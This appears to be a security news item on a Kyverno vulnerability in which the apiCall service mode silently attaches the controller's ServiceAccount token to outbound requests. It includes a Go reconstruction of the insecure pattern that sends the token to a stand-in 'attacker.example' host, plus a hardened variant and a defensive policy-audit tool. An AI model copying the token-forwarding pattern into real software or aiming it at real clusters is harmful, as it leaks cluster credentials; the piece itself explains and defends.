Anonymous Intelligence Signal

Kyverno apiCall Service Mode Exposes Kubernetes ServiceAccount Tokens by Default in High-Severity Vulnerability

The Lab (human) | unverified | 2026-04-24 03:54:06 | Source: GitHub Issues

A high-severity vulnerability in Kyverno's policy engine causes the admission controller's ServiceAccount token to be forwarded to external endpoints without the policy author's knowledge or consent. The flaw, tracked as GHSA-8wfp-579w-6r25, stems from an insecure-by-default behavior in Kyverno's apiCall service mode: the controller's ServiceAccount token is silently attached to outbound HTTP requests. A policy whose apiCall target is an attacker-controlled server therefore leaks the token even though nothing in the policy asks for credentials to be sent.

The exposed mechanism resides in the apiCall executor at `pkg/engine/apicall/executor.go`. When building the outbound request, the code reads the ServiceAccount token from the standard Kubernetes projection path (`/var/run/secrets/kubernetes.io/serviceaccount/token`) and injects it as an `Authorization: Bearer <token>` header whenever the policy definition sets no explicit Authorization header. The affected block checks whether the header is empty, retrieves the token via `a.getToken()`, and adds it to the request. Nothing in the policy indicates that this will happen: a policy that only names a service URL still sends the controller's credential with every call.
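To make the difference concrete, here is an added Go example (not Kyverno's code and not a copy of `executor.go`) that reconstructs the pattern described above beside a hardened, opt-in variant. The function names, the `ForwardOpts` allowlist, the TLS requirement and the token value are assumptions of this example, not behaviour documented on this page.

```go
package main

import (
	"fmt"
	"net/http"
	"net/url"
	"strings"
)

// TokenSource abstracts reading the pod's projected ServiceAccount token.
// A real admission controller would read
// /var/run/secrets/kubernetes.io/serviceaccount/token; here the token is
// injected so the example runs offline.
type TokenSource func() (string, error)

// constructedToken stands in for the controller's real token (constructed value).
func constructedToken() (string, error) {
	return "constructed.serviceaccount.token", nil
}

// insecureRequest reproduces the insecure-by-default pattern the advisory
// describes: when the policy supplies no Authorization header, the controller's
// own token is attached, regardless of where the request is going.
// Hypothetical reconstruction, not Kyverno's executor code.
func insecureRequest(target string, headers map[string]string, tok TokenSource) (*http.Request, error) {
	req, err := http.NewRequest(http.MethodGet, target, nil)
	if err != nil {
		return nil, err
	}
	for k, v := range headers {
		req.Header.Set(k, v)
	}
	if req.Header.Get("Authorization") == "" {
		t, err := tok()
		if err != nil {
			return nil, err
		}
		req.Header.Set("Authorization", "Bearer "+t)
	}
	return req, nil
}

// ForwardOpts holds the two controls the hardened variant adds (assumed design):
// an explicit opt-in and an allowlist of hosts the token may be sent to.
type ForwardOpts struct {
	ForwardToken bool
	AllowedHosts []string // exact host names, e.g. "kubernetes.default.svc"
}

func hostAllowed(u *url.URL, allowed []string) bool {
	for _, h := range allowed {
		if strings.EqualFold(u.Hostname(), h) {
			return true
		}
	}
	return false
}

// hardenedRequest only attaches the token when the policy opted in, the
// destination is on the allowlist, and the transport is TLS. A policy that
// does none of that gets a request with no credentials at all.
func hardenedRequest(target string, headers map[string]string, tok TokenSource, o ForwardOpts) (*http.Request, error) {
	req, err := http.NewRequest(http.MethodGet, target, nil)
	if err != nil {
		return nil, err
	}
	for k, v := range headers {
		req.Header.Set(k, v)
	}
	if !o.ForwardToken || req.Header.Get("Authorization") != "" {
		return req, nil
	}
	if req.URL.Scheme != "https" {
		return nil, fmt.Errorf("refusing to forward token over %q to %s", req.URL.Scheme, req.URL.Host)
	}
	if !hostAllowed(req.URL, o.AllowedHosts) {
		return nil, fmt.Errorf("refusing to forward token to non-allowlisted host %s", req.URL.Hostname())
	}
	t, err := tok()
	if err != nil {
		return nil, err
	}
	req.Header.Set("Authorization", "Bearer "+t)
	return req, nil
}

func main() {
	attacker := "https://attacker.example/collect" // constructed destination
	r1, _ := insecureRequest(attacker, nil, constructedToken)
	fmt.Printf("insecure -> %s Authorization=%q\n", attacker, r1.Header.Get("Authorization"))

	r2, _ := hardenedRequest(attacker, nil, constructedToken, ForwardOpts{})
	fmt.Printf("hardened -> %s Authorization=%q\n", attacker, r2.Header.Get("Authorization"))

	_, err := hardenedRequest(attacker, nil, constructedToken,
		ForwardOpts{ForwardToken: true, AllowedHosts: []string{"kubernetes.default.svc"}})
	fmt.Println("hardened opt-in to attacker:", err)
}
```

The insecure path sends the bearer token to `attacker.example` with no policy setting involved; the hardened path sends nothing by default and, even after opt-in, refuses plaintext HTTP and any host not on the allowlist.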

Security researchers warn that the combination of undocumented behavior and an insecure default creates significant risk wherever Kyverno policies talk to external services. Clusters that use apiCall service mode for webhook integrations or external validation may expose the controller's ServiceAccount credential, potentially one with elevated permissions, to untrusted endpoints; whoever receives the token can present it to the Kubernetes API with Kyverno's permissions for as long as it remains valid. Because forwarding is not opt-in, policy authors unaware of the behavior can create exfiltration paths without intending to. Organizations running affected Kyverno versions should inventory apiCall policies that reach outside the cluster and apply the mitigations in the official security advisory.
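As an added example, not part of the original report or of the Kyverno project, the following Go program performs the audit suggested above over the JSON produced by `kubectl get clusterpolicy -o json`, reporting every service-mode apiCall whose URL points outside the cluster. The field path `spec.rules[].context[].apiCall.service.url`, the in-cluster host heuristic and the `cluster.local` domain are assumptions of this example; the sample policy listing is constructed.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/url"
	"strings"
)

// Finding is one apiCall service target that points outside the cluster.
type Finding struct {
	Policy, Rule, Context, URL string
}

// policyList mirrors the subset of `kubectl get clusterpolicy -o json` that the
// audit needs. The field path spec.rules[].context[].apiCall.service.url is
// assumed from Kyverno's policy schema.
type policyList struct {
	Items []struct {
		Metadata struct {
			Name string `json:"name"`
		} `json:"metadata"`
		Spec struct {
			Rules []struct {
				Name    string `json:"name"`
				Context []struct {
					Name    string `json:"name"`
					APICall *struct {
						URLPath string `json:"urlPath"`
						Service *struct {
							URL string `json:"url"`
						} `json:"service"`
					} `json:"apiCall"`
				} `json:"context"`
			} `json:"rules"`
		} `json:"spec"`
	} `json:"items"`
}

// isInCluster treats a host as in-cluster when it is a bare service name
// (resolved through the pod's DNS search path) or ends in a cluster service
// suffix. Assumption: the default cluster domain "cluster.local".
func isInCluster(raw string) bool {
	u, err := url.Parse(raw)
	if err != nil || u.Hostname() == "" {
		return false
	}
	h := strings.ToLower(u.Hostname())
	if !strings.Contains(h, ".") {
		return true
	}
	return strings.HasSuffix(h, ".svc") || strings.HasSuffix(h, ".svc.cluster.local")
}

// auditAPICalls returns every service-mode apiCall whose URL leaves the cluster.
// Calls that only set urlPath go to the Kubernetes API server and are not reported.
func auditAPICalls(doc []byte) ([]Finding, error) {
	var pl policyList
	if err := json.Unmarshal(doc, &pl); err != nil {
		return nil, err
	}
	var out []Finding
	for _, p := range pl.Items {
		for _, r := range p.Spec.Rules {
			for _, c := range r.Context {
				if c.APICall == nil || c.APICall.Service == nil || c.APICall.Service.URL == "" {
					continue
				}
				if !isInCluster(c.APICall.Service.URL) {
					out = append(out, Finding{p.Metadata.Name, r.Name, c.Name, c.APICall.Service.URL})
				}
			}
		}
	}
	return out, nil
}

// samplePolicies is a constructed, trimmed-down listing: one in-cluster service
// call, one external validator, one plain API-server lookup via urlPath.
const samplePolicies = `{"items":[
 {"metadata":{"name":"check-registry"},"spec":{"rules":[{"name":"lookup",
   "context":[{"name":"cfg","apiCall":{"service":{"url":"https://registry-check.kyverno.svc/v1"}}}]}]}},
 {"metadata":{"name":"external-validate"},"spec":{"rules":[{"name":"validate",
   "context":[{"name":"verdict","apiCall":{"service":{"url":"https://validator.example.com/check"}}}]}]}},
 {"metadata":{"name":"namespace-labels"},"spec":{"rules":[{"name":"ns",
   "context":[{"name":"ns","apiCall":{"urlPath":"/api/v1/namespaces/{{request.namespace}}"}}]}]}}
]}`

func main() {
	findings, err := auditAPICalls([]byte(samplePolicies))
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s/%s context %q calls external %s\n", f.Policy, f.Rule, f.Context, f.URL)
	}
}
```

On a live cluster, pipe `kubectl get clusterpolicy,policy -A -o json` into `auditAPICalls`; each finding is a policy that would have sent the controller's token to that URL on affected versions.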